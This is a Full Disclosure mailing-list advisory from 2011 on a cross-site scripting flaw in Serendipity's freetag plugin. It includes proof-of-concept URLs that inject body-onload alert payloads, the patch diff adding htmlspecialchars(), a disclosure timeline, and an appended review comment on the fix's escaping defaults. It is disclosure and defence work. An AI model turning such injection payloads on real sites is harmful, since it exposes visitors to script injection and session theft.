Full Disclosure mailing list archives
Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"
From: "sschurtz () t-online de" <sschurtz () t-online de>
Date: Tue, 31 May 2011 18:14:16 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory: Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"
Advisory ID: SSCHADV2011-004
Author: Stefan Schurtz
Affected Software: Successfully tested on: Serendipity 1.5.5 with serendipity_event_freetag - version 3.21
Vendor URL: http://www.s9y.org
Vendor Status: Version 3.22 - Fix possible XSS
CVE-ID: -

==========================
Vulnerability Description:
==========================

This is a Cross-Site Scripting vulnerability

==================
Technical Details:
==================

http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))>

=========
Solution:
=========

Update to the latest version 3.22

diff serendipity_event_freetag.php < <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30 garvinhicking Exp $
<?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24
garvinhicking Exp $ < $propbag->add('version', '3.21');
$propbag->add('version', '3.22');
< $serendipity['smarty']->assign('freetag_tagTitle', is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag);
$serendipity['smarty']->assign('freetag_tagTitle',
htmlspecialchars(is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag));

====================
Disclosure Timeline:
====================

30-May-2011 - informed developers
30-May-2011 - Release date of this security advisory
30-May-2011 - Version 3.22 - Fix possible XSS
31-May-2011 - post on BugTraq and Full-disclosure

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.s9y.org
http://www.rul3z.de/advisories/SSCHADV2011-004.txt
http://ha.ckers.org/xss.html
http://blog.s9y.org/archives/231-serendipity_event_freetag-Plugin-update,-XSS-bug.html
http://www.securityfocus.com/archive/1/518191/30/0/threaded

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEUEARECAAYFAk3lE9gACgkQg3svV2LcbMCkTQCXaQJI6tF86BjiD39MoyApw7u0
JACfc3zu6QhrU4tKsvR3IVCucPw69sg=
=6mbq
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
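
Review bot: the htmlspecialchars() call added around the freetag_tagTitle value takes only the string argument, so quote handling and charset fall back to PHP's defaults, which leave single quotes unescaped. Passing ENT_QUOTES and the blog's charset explicitly would keep the value safe if a template places it inside a single-quoted attribute. The escaping is also applied only at this one assign() call, so any other place that outputs $this->displayTag would need the same treatment, and a short comment noting that freetag_tagTitle is now pre-escaped would help template authors avoid double-encoding it.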